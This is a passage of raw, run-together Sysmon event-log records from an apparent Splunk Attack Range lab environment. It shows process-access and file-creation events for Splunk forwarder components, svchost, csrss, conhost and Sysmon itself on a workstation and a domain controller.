AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51025-false10.0.1.12-8000- 10341000x8000000000000000807612Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:27.007{0C1E0330-F4BA-60EB-7779-00000000D001}32562988C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000807643Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:28.991{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26E7B9A4BCF431C52179BD9134ABFC18,SHA256=38EF928E187EBE79F2EF64D7E38109CB40136342D388F6EA8207814063C0DBE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048933Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:28.459{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB6F43CF408DC4ECCFED61BCF18A040A,SHA256=23F1A3D0A637847EBA7038ADF8FC933A8571334726A20B9505ED9639A3393D0F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807642Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:28.350{0C1E0330-F4BC-60EB-7979-00000000D001}33521076C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807641Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:28.225{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F4BC-60EB-7979-00000000D001}3352C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807640Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:28.225{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807639Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:28.225{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807638Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:28.225{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807637Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:28.225{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807636Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:28.225{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807635Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:28.225{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807634Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:28.225{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807633Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:28.225{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807632Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:28.225{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807631Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:28.225{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F4BC-60EB-7979-00000000D001}3352C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807630Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:28.225{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F4BC-60EB-7979-00000000D001}3352C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807629Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:28.210{0C1E0330-F4BC-60EB-7979-00000000D001}3352C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048934Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:29.460{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4720672E689047AA3F306C372AF5BA11,SHA256=96C4F70478F8AAA7B074AB1FA5D643D4A969285E3E7A53ADEB8BC5E161F481D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807644Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:29.225{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6BF0744DC6E2E413A11A7B3E73DB67E6,SHA256=25E9D2B10FD4E5BCA03DBB1167EE701558C9BBCAB3FC0346D9DA551EDEE08C09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807646Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:30.225{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19BD5F175351DA0F4743D4CE3D2F354B,SHA256=EBACCBE2BD956BF44129A80787B56E3F1D60DD5B49F7E7E16FB631708B0BBF96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048935Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:30.490{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=256638E03BEEB4327FF6376BEC378A6B,SHA256=A6C44C23202A685632672DF0BEB601B0EC28E6D3EE61328053BBC4B61098A23E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807645Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:30.085{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=D7E7E54F32543E0176A7ED2939C6F8E3,SHA256=E6371F6F99617BAF1DC9525ACBC8E224474E17754CAB4369938C08A161DF552B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807647Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:31.225{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=235A634DD587A5CF6BBD212BF8D29A16,SHA256=A29BB6F8965B1C6511612FB481529062BD76D5719B5AD0717E6A2B22E4AB656E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048936Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:31.505{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90A63B6AEF852F4BEF63C64FBEB1D49C,SHA256=8E4C37C633EC334B5F03A2BD8C005D234010E63D91D5011E6C93A1870E9BCFA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048945Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:32.520{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=659B5E8A1F48F3D8DEF1C727C2323F71,SHA256=7AC2C7EA6F26B1655D3E84A0B35B948FDFE8F3BCB8E12F18778960130DE14D86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807648Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:32.257{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=523D6846139339CCCBDCDA35C671BAE5,SHA256=B0FB3AB2E8EA7F1774862EFEDC5B3B53B9179F817BE82F5735426CF65243BF7C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048944Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:32.005{466BC892-F49A-60EB-327D-00000000CF01}61886504C:\Windows\system32\conhost.exe{466BC892-F4C0-60EB-357D-00000000CF01}9832C:\Program Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048943Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:32.005{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048942Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:32.005{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048941Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:32.005{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048940Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:32.005{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048939Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:32.005{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F4C0-60EB-357D-00000000CF01}9832C:\Program Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048938Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:32.005{466BC892-F49A-60EB-317D-00000000CF01}95726844C:\Windows\system32\cmd.exe{466BC892-F4C0-60EB-357D-00000000CF01}9832C:\Program 